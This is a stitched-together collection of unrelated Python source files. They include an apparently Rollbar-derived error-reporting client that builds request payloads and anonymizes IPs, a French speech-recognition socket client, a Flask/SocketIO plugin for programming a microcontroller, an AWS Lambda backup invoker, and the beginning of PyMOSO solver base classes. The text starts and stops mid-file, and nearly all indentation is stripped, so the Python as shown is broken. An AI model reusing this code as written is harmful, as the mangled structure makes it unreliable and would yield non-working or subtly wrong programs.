# Get all of the named args
#
# args can be a nested list of args in the case where there
# are anonymous tuple args provided.
# e.g. in Python 2 you can:
# def func((x, (a, b), z)):
# return x + a + b + z
#
# func((1, (1, 2), 3))
argspec = _flatten_nested_lists(arginfo.args)
if arginfo.varargs is not None:
varargspec = arginfo.varargs
if SETTINGS['locals']['scrub_varargs']:
temp_varargs = list(arginfo.locals[varargspec])
for i, arg in enumerate(temp_varargs):
temp_varargs[i] = REDACT_REF
arginfo.locals[varargspec] = tuple(temp_varargs)
if arginfo.keywords is not None:
keywordspec = arginfo.keywords
_locals.update(arginfo.locals.items())
except Exception:
log.exception('Error while extracting arguments from frame. Ignoring.')
# Finally, serialize each arg/kwarg/local separately so that we only report
# CircularReferences for each variable, instead of for the entire payload
        # as would be the case if we serialized that payload in one shot.
if argspec:
cur_frame['argspec'] = argspec
if varargspec:
cur_frame['varargspec'] = varargspec
if keywordspec:
cur_frame['keywordspec'] = keywordspec
if _locals:
try:
cur_frame['locals'] = dict((k, _serialize_frame_data(v)) for k, v in iteritems(_locals))
except Exception:
log.exception('Error while serializing frame data.')
frame_num += 1
def _serialize_frame_data(data):
for transform in (ScrubRedactTransform(), _serialize_transform):
data = transforms.transform(data, transform)
return data
def _add_lambda_context_data(data):
"""
Attempts to add information from the lambda context if it exists
"""
global _CURRENT_LAMBDA_CONTEXT
context = _CURRENT_LAMBDA_CONTEXT
if context is None:
return
try:
lambda_data = {
'lambda': {
'remaining_time_in_millis': context.get_remaining_time_in_millis(),
'function_name': context.function_name,
'function_version': context.function_version,
'arn': context.invoked_function_arn,
'request_id': context.aws_request_id,
}
}
if 'custom' in data:
data['custom'] = dict_merge(data['custom'], lambda_data)
else:
data['custom'] = lambda_data
except Exception as e:
log.exception("Exception while adding lambda context data: %r", e)
finally:
_CURRENT_LAMBDA_CONTEXT = None
def _add_request_data(data, request):
"""
Attempts to build request data; if successful, sets the 'request' key on `data`.
"""
try:
request_data = _build_request_data(request)
except Exception as e:
log.exception("Exception while building request_data for Rollbar payload: %r", e)
else:
if request_data:
_filter_ip(request_data, SETTINGS['capture_ip'])
data['request'] = request_data
def _check_add_locals(frame, frame_num, total_frames):
"""
Returns True if we should record local variables for the given frame.
"""
# Include the last frames locals
# Include any frame locals that came from a file in the project's root
return any(((frame_num == total_frames - 1),
('root' in SETTINGS and (frame.get('filename') or '').lower().startswith((SETTINGS['root'] or '').lower()))))
def _get_actual_request(request):
if WerkzeugLocalProxy and isinstance(request, WerkzeugLocalProxy):
try:
actual_request = request._get_current_object()
except RuntimeError:
return None
return actual_request
return request
def _build_request_data(request):
"""
Returns a dictionary containing data from the request.
Can handle webob or werkzeug-based request objects.
"""
# webob (pyramid)
if WebobBaseRequest and isinstance(request, WebobBaseRequest):
return _build_webob_request_data(request)
# django
if DjangoHttpRequest and isinstance(request, DjangoHttpRequest):
return _build_django_request_data(request)
# django rest framework
if RestFrameworkRequest and isinstance(request, RestFrameworkRequest):
return _build_django_request_data(request)
# werkzeug (flask)
if WerkzeugRequest and isinstance(request, WerkzeugRequest):
return _build_werkzeug_request_data(request)
# tornado
if TornadoRequest and isinstance(request, TornadoRequest):
return _build_tornado_request_data(request)
# bottle
if BottleRequest and isinstance(request, BottleRequest):
return _build_bottle_request_data(request)
# Sanic
if SanicRequest and isinstance(request, SanicRequest):
return _build_sanic_request_data(request)
# falcon
if FalconRequest and isinstance(request, FalconRequest):
return _build_falcon_request_data(request)
# Plain wsgi (should be last)
if isinstance(request, dict) and 'wsgi.version' in request:
return _build_wsgi_request_data(request)
return None
def _build_webob_request_data(request):
request_data = {
'url': request.url,
'GET': dict(request.GET),
'user_ip': _extract_user_ip(request),
'headers': dict(request.headers),
'method': request.method,
}
try:
if request.json:
request_data['json'] = request.json
except:
pass
# pyramid matchdict
if getattr(request, 'matchdict', None):
request_data['params'] = request.matchdict
# workaround for webob bug when the request body contains binary data but has a text
# content-type
try:
request_data['POST'] = dict(request.POST)
except UnicodeDecodeError:
request_data['body'] = request.body
return request_data
def _extract_wsgi_headers(items):
headers = {}
for k, v in items:
if k.startswith('HTTP_'):
header_name = '-'.join(k[len('HTTP_'):].replace('_', ' ').title().split(' '))
headers[header_name] = v
return headers
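# Example: {'HTTP_X_FORWARDED_FOR': '1.2.3.4', 'HTTP_USER_AGENT': 'curl'}
# becomes {'X-Forwarded-For': '1.2.3.4', 'User-Agent': 'curl'}; keys without
# the HTTP_ prefix are dropped.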
def _build_django_request_data(request):
try:
url = request.get_raw_uri()
except AttributeError:
url = request.build_absolute_uri()
request_data = {
'url': url,
'method': request.method,
'GET': dict(request.GET),
'POST': dict(request.POST),
'user_ip': _wsgi_extract_user_ip(request.META),
}
if SETTINGS['include_request_body']:
try:
request_data['body'] = request.body
except:
pass
request_data['headers'] = _extract_wsgi_headers(request.META.items())
return request_data
def _build_werkzeug_request_data(request):
request_data = {
'url': request.url,
'GET': dict(request.args),
'POST': dict(request.form),
'user_ip': _extract_user_ip(request),
'headers': dict(request.headers),
'method': request.method,
'files_keys': list(request.files.keys()),
}
try:
if request.json:
request_data['body'] = request.json
except Exception:
pass
return request_data
def _build_tornado_request_data(request):
request_data = {
'url': request.full_url(),
'user_ip': request.remote_ip,
'headers': dict(request.headers),
'method': request.method,
'files_keys': request.files.keys(),
'start_time': getattr(request, '_start_time', None),
}
request_data[request.method] = request.arguments
return request_data
def _build_bottle_request_data(request):
request_data = {
'url': request.url,
'user_ip': request.remote_addr,
'headers': dict(request.headers),
'method': request.method,
'GET': dict(request.query)
}
if request.json:
try:
request_data['body'] = request.body.getvalue()
except:
pass
else:
request_data['POST'] = dict(request.forms)
return request_data
def _build_sanic_request_data(request):
request_data = {
'url': request.url,
'user_ip': request.remote_addr,
'headers': request.headers,
'method': request.method,
'GET': dict(request.args)
}
if request.json:
try:
request_data['body'] = request.json
except:
pass
else:
request_data['POST'] = request.form
return request_data
def _build_falcon_request_data(request):
request_data = {
'url': request.url,
'user_ip': _wsgi_extract_user_ip(request.env),
'headers': dict(request.headers),
'method': request.method,
'GET': dict(request.params),
'context': dict(request.context),
}
return request_data
def _build_wsgi_request_data(request):
request_data = {
'url': wsgiref.util.request_uri(request),
'user_ip': _wsgi_extract_user_ip(request),
'method': request.get('REQUEST_METHOD'),
}
if 'QUERY_STRING' in request:
request_data['GET'] = parse_qs(request['QUERY_STRING'], keep_blank_values=True)
# Collapse single item arrays
request_data['GET'] = dict((k, v[0] if len(v) == 1 else v) for k, v in request_data['GET'].items())
request_data['headers'] = _extract_wsgi_headers(request.items())
try:
length = int(request.get('CONTENT_LENGTH', 0))
except ValueError:
length = 0
input = request.get('wsgi.input')
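    # Only capture the body when the stream is seekable: remember the current
    # offset, rewind, read CONTENT_LENGTH bytes, then restore the offset so
    # downstream consumers can still read the body.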
if length and input and hasattr(input, 'seek') and hasattr(input, 'tell'):
pos = input.tell()
input.seek(0, 0)
request_data['body'] = input.read(length)
input.seek(pos, 0)
return request_data
def _filter_ip(request_data, capture_ip):
if 'user_ip' not in request_data or capture_ip == True:
return
current_ip = request_data['user_ip']
if not current_ip:
return
new_ip = current_ip
if not capture_ip:
new_ip = None
elif capture_ip == ANONYMIZE:
try:
if '.' in current_ip:
new_ip = '.'.join(current_ip.split('.')[0:3]) + '.0'
elif ':' in current_ip:
parts = current_ip.split(':')
if len(parts) > 2:
terminal = '0000:0000:0000:0000:0000'
new_ip = ':'.join(parts[0:3] + [terminal])
else:
new_ip = None
except:
new_ip = None
request_data['user_ip'] = new_ip
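# Worked examples of the anonymization branch above (capture_ip == ANONYMIZE):
#   '203.0.113.45'                         -> '203.0.113.0'
#   '2001:db8:85a3:8d3:1319:8a2e:370:7344' -> '2001:db8:85a3:0000:0000:0000:0000:0000'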
def _build_server_data():
"""
Returns a dictionary containing information about the server environment.
"""
# server environment
server_data = {
'host': socket.gethostname(),
'pid': os.getpid()
}
# argv does not always exist in embedded python environments
argv = getattr(sys, 'argv', None)
if argv:
server_data['argv'] = argv
for key in ['branch', 'root']:
if SETTINGS.get(key):
server_data[key] = SETTINGS[key]
return server_data
def _transform(obj, key=None):
for transform in _transforms:
obj = transforms.transform(obj, transform, key=key)
return obj
def _build_payload(data):
"""
Returns the full payload as a string.
"""
for k, v in iteritems(data):
data[k] = _transform(v, key=(k,))
payload = {
'access_token': SETTINGS['access_token'],
'data': data
}
return payload
def _serialize_payload(payload):
return json.dumps(payload, default=defaultJSONEncode)
def _send_payload(payload_str, access_token):
try:
_post_api('item/', payload_str, access_token=access_token)
except Exception as e:
log.exception('Exception while posting item %r', e)
try:
_threads.get_nowait()
_threads.task_done()
except queue.Empty:
pass
def _send_payload_appengine(payload_str, access_token):
try:
_post_api_appengine('item/', payload_str, access_token=access_token)
except Exception as e:
log.exception('Exception while posting item %r', e)
def _post_api_appengine(path, payload_str, access_token=None):
headers = {'Content-Type': 'application/json'}
if access_token is not None:
headers['X-Rollbar-Access-Token'] = access_token
url = urljoin(SETTINGS['endpoint'], path)
resp = AppEngineFetch(url,
method="POST",
payload=payload_str,
headers=headers,
allow_truncated=False,
deadline=SETTINGS.get('timeout', DEFAULT_TIMEOUT),
validate_certificate=SETTINGS.get('verify_https', True))
return _parse_response(path, SETTINGS['access_token'], payload_str, resp)
def _post_api(path, payload_str, access_token=None):
headers = {'Content-Type': 'application/json'}
if access_token is not None:
headers['X-Rollbar-Access-Token'] = access_token
url = urljoin(SETTINGS['endpoint'], path)
resp = transport.post(url,
data=payload_str,
headers=headers,
timeout=SETTINGS.get('timeout', DEFAULT_TIMEOUT),
verify=SETTINGS.get('verify_https', True),
proxy=SETTINGS.get('http_proxy'),
proxy_user=SETTINGS.get('http_proxy_user'),
proxy_password=SETTINGS.get('http_proxy_password'))
return _parse_response(path, SETTINGS['access_token'], payload_str, resp)
def _get_api(path, access_token=None, endpoint=None, **params):
access_token = access_token or SETTINGS['access_token']
url = urljoin(endpoint or SETTINGS['endpoint'], path)
params['access_token'] = access_token
resp = transport.get(url,
params=params,
verify=SETTINGS.get('verify_https', True),
proxy=SETTINGS.get('http_proxy'),
proxy_user=SETTINGS.get('http_proxy_user'),
proxy_password=SETTINGS.get('http_proxy_password'))
return _parse_response(path, access_token, params, resp, endpoint=endpoint)
def _send_payload_tornado(payload_str, access_token):
try:
_post_api_tornado('item/', payload_str, access_token=access_token)
except Exception as e:
log.exception('Exception while posting item %r', e)
def _post_api_tornado(path, payload_str, access_token=None):
headers = {'Content-Type': 'application/json'}
if access_token is not None:
headers['X-Rollbar-Access-Token'] = access_token
else:
access_token = SETTINGS['access_token']
url = urljoin(SETTINGS['endpoint'], path)
def post_tornado_cb(resp):
r = requests.Response()
r._content = resp.body
r.status_code = resp.code
r.headers.update(resp.headers)
try:
_parse_response(path, access_token, payload_str, r)
except Exception as e:
log.exception('Exception while posting item %r', e)
TornadoAsyncHTTPClient().fetch(url,
callback=post_tornado_cb,
raise_error=False,
body=payload_str,
method='POST',
connect_timeout=SETTINGS.get('timeout', DEFAULT_TIMEOUT),
request_timeout=SETTINGS.get('timeout', DEFAULT_TIMEOUT))
def _send_payload_twisted(payload_str, access_token):
try:
_post_api_twisted('item/', payload_str, access_token=access_token)
except Exception as e:
log.exception('Exception while posting item %r', e)
def _post_api_twisted(path, payload_str, access_token=None):
def post_data_cb(data, resp):
resp._content = data
_parse_response(path, SETTINGS['access_token'], payload_str, resp)
def post_cb(resp):
r = requests.Response()
r.status_code = resp.code
r.headers.update(resp.headers.getAllRawHeaders())
return treq.content(resp).addCallback(post_data_cb, r)
headers = {'Content-Type': ['application/json; charset=utf-8']}
if access_token is not None:
headers['X-Rollbar-Access-Token'] = [access_token]
url = urljoin(SETTINGS['endpoint'], path)
try:
encoded_payload = payload_str.encode('utf8')
except (UnicodeDecodeError, UnicodeEncodeError):
encoded_payload = payload_str
d = treq.post(url, encoded_payload, headers=headers,
timeout=SETTINGS.get('timeout', DEFAULT_TIMEOUT))
d.addCallback(post_cb)
def _send_failsafe(message, uuid, host):
body_message = ('Failsafe from pyrollbar: {0}. Original payload may be found '
'in your server logs by searching for the UUID.').format(message)
data = {
'level': 'error',
'environment': SETTINGS['environment'],
'body': {
'message': {
'body': body_message
}
},
'notifier': SETTINGS['notifier'],
'custom': {
'orig_uuid': uuid,
'orig_host': host
},
'failsafe': True,
'internal': True,
}
payload = _build_payload(data)
try:
send_payload(payload, SETTINGS['access_token'])
except Exception:
log.exception('Rollbar: Error sending failsafe.')
def _parse_response(path, access_token, params, resp, endpoint=None):
if isinstance(resp, requests.Response):
try:
data = resp.text
except Exception:
data = resp.content
log.error('resp.text is undefined, resp.content is %r', resp.content)
else:
data = resp.content
global _LAST_RESPONSE_STATUS
last_response_was_429 = _LAST_RESPONSE_STATUS == 429
_LAST_RESPONSE_STATUS = resp.status_code
if resp.status_code == 429:
if SETTINGS['log_all_rate_limited_items'] or not last_response_was_429:
log.warning("Rollbar: over rate limit, data was dropped. Payload was: %r", params)
return
elif resp.status_code == 502:
log.exception('Rollbar api returned a 502')
return
elif resp.status_code == 413:
uuid = None
host = None
try:
payload = json.loads(params)
uuid = payload['data']['uuid']
host = payload['data']['server']['host']
log.error("Rollbar: request entity too large for UUID %r\n. Payload:\n%r", uuid, payload)
except (TypeError, ValueError):
log.exception('Unable to decode JSON for failsafe.')
except KeyError:
log.exception('Unable to find payload parameters for failsafe.')
_send_failsafe('payload too large', uuid, host)
# TODO: Should we return here?
elif resp.status_code != 200:
log.warning("Got unexpected status code from Rollbar api: %s\nResponse:\n%s",
resp.status_code, data)
# TODO: Should we also return here?
try:
json_data = json.loads(data)
except (TypeError, ValueError):
log.exception('Could not decode Rollbar api response:\n%s', data)
raise ApiException('Request to %s returned invalid JSON response', path)
else:
if json_data.get('err'):
raise ApiError(json_data.get('message') or 'Unknown error')
result = json_data.get('result', {})
if 'page' in result:
return PagedResult(access_token, path, result['page'], params, result, endpoint=endpoint)
else:
return Result(access_token, path, params, result)
def _extract_user_ip(request):
# some common things passed by load balancers... will need more of these.
real_ip = request.headers.get('X-Real-Ip')
if real_ip:
return real_ip
forwarded_for = request.headers.get('X-Forwarded-For')
if forwarded_for:
return forwarded_for
return request.remote_addr
def _wsgi_extract_user_ip(environ):
forwarded_for = environ.get('HTTP_X_FORWARDED_FOR')
if forwarded_for:
return forwarded_for
real_ip = environ.get('HTTP_X_REAL_IP')
if real_ip:
return real_ip
return environ['REMOTE_ADDR']
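def _example_wsgi_extract_user_ip():
    # Illustrative sketch: _wsgi_extract_user_ip prefers X-Forwarded-For,
    # then X-Real-Ip, then the socket-level REMOTE_ADDR.
    environ = {
        'REMOTE_ADDR': '10.0.0.1',
        'HTTP_X_REAL_IP': '198.51.100.7',
        'HTTP_X_FORWARDED_FOR': '203.0.113.42',
    }
    assert _wsgi_extract_user_ip(environ) == '203.0.113.42'
    del environ['HTTP_X_FORWARDED_FOR']
    assert _wsgi_extract_user_ip(environ) == '198.51.100.7'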
|
main_client.py | #!/usr/bin/env python3
import time, json, socket, queue, os, threading, gtts
import speech_recognition as sr
waitingForConf = False
lastQuestion = None
readyToReceive = False
triggerWord = 'Jean-marie'
sock = None
def callback(recognizer, audio):
try:
text = recognizer.recognize_google(audio, language="fr-FR")
print("Google Speech Recognition thinks you said : " + text)
handleSentence(text)
except sr.UnknownValueError:
print("Google Speech Recognition could not understand audio")
except sr.RequestError as e:
print("Could not request results from Google Speech Recognition service; {0}".format(e))
def handleSentence(text):
global lastQuestion, readyToReceive, sock
    if triggerWord in text.split(' ', 1)[0]: # trigger on the first word
        text = text.partition(' ')[2] # strip the trigger word
js = None
if not waitingForConf or lastQuestion is None:
js = json.dumps({'type': 'question', 'msg': text, 'answer': ''})
lastQuestion = text
else:
js = json.dumps({'type': 'question', 'msg': lastQuestion, 'answer': text})
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setblocking(True)
sock.settimeout(None)
sock.connect(('localhost', 15555))
sock.send(str.encode(js))
readyToReceive = True
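def exampleStubServer():
    # Hedged test-server sketch, illustrative only (not part of this client):
    # handleSentence opens one TCP connection per utterance on localhost:15555,
    # sends a single JSON object, then speechThread blocks on recv() for a
    # JSON reply carrying a 'msg' field. A stub peer can therefore be:
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(('localhost', 15555))
    srv.listen(1)
    conn, _ = srv.accept()
    question = json.loads(conn.recv(1024).decode('utf-8'))
    conn.send(json.dumps({'msg': 'echo: ' + question['msg']}).encode('utf-8'))
    conn.close()
    srv.close()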
def speechThread():
global readyToReceive, sock
r = sr.Recognizer()
r.energy_threshold = 4000
m = sr.Microphone()
with m as source:
r.adjust_for_ambient_noise(source)
stop_listening = r.listen_in_background(m, callback)
    while True:
if readyToReceive:
text = json.loads(sock.recv(1024).decode('utf-8'))
sock.close()
if text:
print("received", text['msg'])
stop_listening(wait_for_stop=False)
tts = gtts.gTTS(text=text['msg'], lang='fr')
tts.save("text.mp3")
os.system("mplayer text.mp3 1> /dev/null 2> /dev/null")
os.remove("text.mp3")
stop_listening = r.listen_in_background(m, callback)
readyToReceive = False
time.sleep(0.1)
t = threading.Thread(target=speechThread)
t.start()
while True: time.sleep(0.1)
|
__init__.py | from application import Application
from hardware import SERIAL_PORT, DEFAULT_SERIAL_SPEED
import os
import threading
import logging
from flask import Flask, send_from_directory, jsonify, request
from serial.serialutil import SerialException
from flask_socketio import SocketIO
from .. import Plugin
import time
from views import View
from .SerialConnectionThread import close_serial, SerialConnectionThread, ser, serial_speed, export_text, export_config
from profiles import profile_data
test_conf = {}
WEB_SERVER_PORT = 8080
logging.getLogger("socketio").setLevel(logging.ERROR)
logging.getLogger("engineio").setLevel(logging.ERROR)
logging.getLogger("werkzeug").setLevel(logging.ERROR)
class LempaPlugin(Plugin, View):
def __init__(self, app):
super().__init__(app)
self.serial_daemon = None
self.app = app
self.cnt = 0
self.server = Flask(__name__)
self.server.debug = False
self.server.add_url_rule("/", "root", self.root)
self.server.add_url_rule(
"/data", "data_get", self.data_get, methods=["GET"])
self.server.add_url_rule("/data", "data_post",
self.data_post, methods=["POST"])
self.server.add_url_rule(
"/profiles", "profiles_get", self.profiles_get, methods=["GET"])
self.server.add_url_rule("/prgm", "btn_prgm",
self.btn_prgm, methods=["POST"])
self.server.add_url_rule("/erase", "btn_erase",
self.btn_erase, methods=["POST"])
self.server.add_url_rule("/reload", "btn_reload",
self.btn_reload, methods=["POST"])
self.server.add_url_rule("/favicon.ico", "favicon", self.favicon)
self.socketio = SocketIO(
            self.server, cors_allowed_origins="*", log_output=False)
def header(self):
        if self.serial_daemon:
self.serial_daemon.state_changed(self.app.app_state)
self.socketio.emit("viewHeader", self.app.app_state)
def print(self, txt):
self.socketio.emit("viewPrint", txt)
def detail(self, txt):
self.socketio.emit("viewDetail", txt)
def error(self, e):
self.socketio.emit("viewError", str(e))
def cleanup(self):
pass
def set_profile_name(self, x):
self.socketio.emit("viewProfile", x)
def load_conf(self, conf):
global test_conf, serial_speed
serial_speed = conf["serialSpeed"]
test_conf = conf["fields"]
close_serial()
def run(self):
self.app.detail(
"LEMPA Web Interface on port {}".format(WEB_SERVER_PORT))
self.socketio.run(self.server, host="0.0.0.0", port=WEB_SERVER_PORT)
def on_start(self):
self.serial_daemon = SerialConnectionThread(self.app.serial_port,self.serial_in, self.update_serial_status)
daemon1 = threading.Thread(name="daemon_server", target=self.run)
        daemon1.daemon = True
daemon1.start()
daemon2 = threading.Thread(name="serial_listener", target=self.serial_daemon.run)
        daemon2.daemon = True
daemon2.start()
def data_get(self):
output = {}
output["header"] = self.app.app_state
output["profile"] = self.app.profile_info
output["serial"] = {"port" : SERIAL_PORT, "enabled" : (self.app.serial_port != None), "speed" : DEFAULT_SERIAL_SPEED}
output["binData"] = test_conf
return jsonify(output)
def profiles_get(self):
return jsonify(profile_data)
def serial_in(self, s):
self.socketio.emit("serialin", s)
def update_serial_status(self):
data = {"connected": (ser is not None), "speed": serial_speed}
self.socketio.emit("serialstatus", data)
def root(self):
return send_from_directory("./static", "index.html")
def btn_prgm(self):
self.app.move_to_state = Application.APP_STATE_PROGRAMMING
return "ok"
def btn_erase(self):
self.app.move_to_state = Application.APP_STATE_ERASE
return "ok"
def btn_reload(self):
self.app.move_to_state = Application.APP_STATE_FIRMWARE_DOWNLOAD
return "ok"
def data_post(self):
j = request.get_json(force=True)
if j["type"] == "form":
for f in j["data"]:
for f1 in test_conf:
if f1["id"] == f["id"]:
f1["value"] = f["value"]
export_config(test_conf)
log = ",".join("0x{:02X}".format(a)
for a in map(lambda x: int(x["value"]), test_conf))
self.socketio.emit("serialout", log)
elif j["type"] == "text":
txt = j["data"]
export_text(txt)
self.socketio.emit("serialout", txt)
else:
raise ValueError("Unknown type")
return "Data (probably) sent to MCU"
def favicon(self):
return send_from_directory(
os.path.join(self.server.root_path, "static"),
"favicon.ico",
mimetype="image/vnd.microsoft.icon",
)
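# Hedged usage sketch, illustrative only: alongside its socket.io events the
# plugin exposes a small REST surface on WEB_SERVER_PORT. Assuming the
# `requests` library, a client could read state and push form values like so:
#
#     import requests
#     base = "http://localhost:8080"
#     state = requests.get(base + "/data").json()   # header/profile/serial/binData
#     requests.post(base + "/data", json={
#         "type": "form",
#         "data": [{"id": "f1", "value": "1"}],     # ids must exist in test_conf
#     })
#     requests.post(base + "/prgm")                 # request programming state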
|
shelvery_invoker.py | import boto3
import os
import json
import logging
from typing import Dict
from threading import Thread
from shelvery.runtime_config import RuntimeConfig
from shelvery.aws_helper import AwsHelper
from shelvery.queue import ShelveryQueue
class ShelveryInvoker:
"""Helper to orchestrate execution of shelvery operations on AWS Lambda platform"""
def invoke_shelvery_operation(self, engine, method_name: str, method_arguments: Dict):
"""
Invokes shelvery engine asynchronously
        If shelvery is running within a lambda environment, a new lambda function invocation will be made. If running
        on a server, it will start a new thread and invoke the function.
        The invoked function must accept its arguments in the form of a map.
"""
is_lambda_context = RuntimeConfig.is_lambda_runtime(engine)
is_offload_queueing = RuntimeConfig.is_offload_queueing(engine)
parameters = {
'backup_type': engine.get_engine_type(),
'action': method_name,
'arguments': method_arguments
}
if is_lambda_context:
if 'config' in engine.lambda_payload:
parameters['config'] = engine.lambda_payload['config']
if is_offload_queueing:
sqs = ShelveryQueue(RuntimeConfig.get_sqs_queue_url(engine),RuntimeConfig.get_sqs_queue_wait_period(engine))
sqs.send(parameters)
else:
parameters['is_started_internally'] = True
payload = json.dumps(parameters)
bytes_payload = bytearray()
bytes_payload.extend(map(ord, payload))
function_name = os.environ['AWS_LAMBDA_FUNCTION_NAME']
lambda_client = AwsHelper.boto3_client('lambda')
lambda_client.invoke_async(FunctionName=function_name, InvokeArgs=bytes_payload)
else:
resource_type = engine.get_engine_type()
def execute():
from shelvery.factory import ShelveryFactory
backup_engine = ShelveryFactory.get_shelvery_instance(resource_type)
method = backup_engine.__getattribute__(method_name)
method(method_arguments)
logging.info(f"Start new thread to execute :{method_name}")
if 'SHELVERY_MONO_THREAD' in os.environ and os.environ['SHELVERY_MONO_THREAD'] == "1":
execute()
else:
thread = Thread(target=execute)
thread.start()
# thread.join()
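# Hedged usage sketch, illustrative only: dispatching an operation through the
# invoker. In a Lambda runtime this re-invokes the function (or enqueues to
# SQS); on a server it runs in a background thread. The method name
# 'create_backups' is an assumed example and is looked up on the engine via
# __getattribute__:
#
#     invoker = ShelveryInvoker()
#     invoker.invoke_shelvery_operation(engine, 'create_backups', {})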
|
chnbase.py | # MIT License
# Copyright (c) 2018 Kyle Cooper and Susan Hunter
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#!/usr/bin/env python
"""
Provide base classes and supporting functions for problem and solver
implementations.
Listing
--------------
mp_replicate, function
mp_worker, function
MOSOSolver(object), class
RASolver(MOSOSolver), class
RLESolver(RASolver), class
Oracle(object), class
"""
from statistics import mean, variance
from math import sqrt, ceil, floor
from .prng.mrg32k3a import get_next_prnstream, jump_substream, mrg32k3a, bsm
from multiprocessing import Queue, Process
import sys
from .chnutils import perturb, argsort, enorm, get_setnbors, get_nbors, is_lwep, get_nondom, does_strict_dominate, does_weak_dominate, does_dominate, get_biparetos
def mp_replicate(orccls, x, rngcls, seed):
"""
Wrap `Oracle.g` in a top-level function for use with multiprocessing.
Parameters
----------
orccls : Oracle class
x : tuple of int
rngcls : random.Random class
seed : tuple of int
Returns
-------
isfeas : bool
objvals : tuple of float
See also
--------
Oracle.replicate
"""
rng = rngcls(seed)
orc = orccls(rng)
orc.set_crnflag(False)
isfeas, objvals = orc.g(x, rng)
return isfeas, objvals
def mp_worker(input, output):
"""
Process an item from `input` queue and place results in `output` queue.
Parameters
----------
input : multiprocessing.Queue object
output : multiprocessing.Queue object
"""
for func, args in iter(input.get, 'STOP'):
result = func(*args)
output.put(result)
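def mp_example_usage():
    """
    Hedged sketch, illustrative only (not part of the PyMOSO API), of the
    worker-queue pattern used by `mp_worker`: jobs are (function, args)
    tuples, and each worker loops until it pulls the 'STOP' sentinel.
    """
    task_q = Queue()
    done_q = Queue()
    workers = [Process(target=mp_worker, args=(task_q, done_q)) for _ in range(2)]
    for p in workers:
        p.start()
    for job_args in ((2, 3), (3, 4)):
        task_q.put((pow, job_args))
    results = [done_q.get() for _ in range(2)]
    for _ in workers:
        task_q.put('STOP')
    for p in workers:
        p.join()
    return results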
class MOSOSolver(object):
"""
    Base class for solver implementations.
Attributes
----------
orc : Oracle
The problem implementation to solve
num_calls : int
The total number of calls to orc.g
num_obj : int
The number of objectives returned by orc.g
    dim : int
        The cardinality of points in the domain of orc.g
Parameters
----------
orc: Oracle object
Notes
-----
    The solve method must be implemented in sub-classes for use in
PyMOSO.
"""
def __init__(self, orc):
self.orc = orc
self.num_calls = 0
self.num_obj = self.orc.num_obj
self.dim = self.orc.dim
super().__init__()
# def solve(self, budget):
# raise NotImplementedError
class RASolver(MOSOSolver):
"""
Base class for Retrospective Approximation algorithm
implementations. The class methods assume integer-ordered feasible
points.
Attributes
----------
orc : Oracle
The problem implementation to solve
num_calls : int
The total number of calls to orc.g
num_obj : int
The number of objectives returned by orc.g
dim : int
The cardinality of points in the domain of orc.g
nbor_rad : int
        The radius used to determine point neighbors, default is 1
mconst : int
Affects the iteration sample sizes. Default is 2
    bconst : int
        Affects the iteration sampling search limits. Default is 8.
    sprn : prng.MRG32k3a object
Pseudo-random number stream available to the solver, should
generate independently of orc.rng.
x0 : tuple of numbers
Vector points such that x0[0] is its first component, and
x0[orc.dim - 1] is the last.
gbar : dict
Dictionary of {tuple of int: tuple of float} mapping feasible
points to their objective values. In RA algorithms, it is
cleared every iteration.
sehat : dict
Like gbar, but maps feasible points to standard errors of
the objective values.
m : int
Iteration sample size which is automatically updated
b : int
Iteration search sampling limit which is automatically updated
nu : int
The iteration number
endseed : tuple of int
The next seed to be used by 'orc.rng'
Parameters
----------
orc : Oracle object
kwargs : dict
Notes
-----
The method spsolve must be implemented to use an RASolver in
PyMOSO
"""
def __init__(self, orc, **kwargs):
self.nbor_rad = kwargs.pop('radius', 1)
self.mconst = kwargs.pop('mconst', 2)
self.bconst = kwargs.pop('bconst', 8)
try:
self.sprn = kwargs.pop('sprn')
self.x0 = kwargs.pop('x0')
except KeyError:
print('--* Error: Please specify an x0 and a random number seed for the solver.')
print('--* Aborting. ')
sys.exit()
super().__init__(orc)
def solve(self, budget):
"""
Solves the MOSO problem implicitly implemented in orc.
Parameters
----------
budget : int
The maximum number of calls allowed to orc.g
Returns
-------
resdict : dict
"""
seed1 = self.orc.rng.get_seed()
self.endseed = seed1
lesnu = dict()
simcalls = dict()
lesnu[0] = set() | {self.x0}
simcalls[0] = 0
# initialize the iteration counter
self.nu = 0
# invoke the Retrospective approximation algorithm
self.rasolve(lesnu, simcalls, budget)
# name the data keys and return the results
resdict = {'itersoln': lesnu, 'simcalls': simcalls, 'endseed': self.endseed}
return resdict
def rasolve(self, phatnu, simcalls, budget):
"""
Repeatedly solve the sample-path problem using a sequence of
increasing sample sizes.
Parameters
----------
phatnu : dict
Stores the set of tuples of int for each iteration
simcalls : dict
Dictionary of {iteration int : int of calls to orc.g}
budget : int
Total number of calls allowed to orc.g across all iterations
Notes
-----
        This function does not return anything; it updates the simcalls,
phatnu dictionaries and the endseed value.
"""
while self.num_calls < budget:
self.nu += 1
self.m = self.calc_m(self.nu)
self.b = self.calc_b(self.nu)
self.gbar = dict()
self.sehat = dict()
#print(self.nu)
#print('warm start: ', phatnu[self.nu - 1])
aold = phatnu[self.nu - 1]
phatnu[self.nu] = self.spsolve(aold)
#print('spsolve: ', phatnu[self.nu])
simcalls[self.nu] = self.num_calls
self.orc.crn_advance()
self.endseed = self.orc.rng.get_seed()
def get_min(self, mcS):
"""
Generate a sample path minimizer for every objective and other
visited, non-dominated points.
Parameters
----------
mcS : set
Set of tuples of int representing feasible point of orc.
Returns
-------
xmin : set
Set of non-dominated points searched by spline in every
objective.
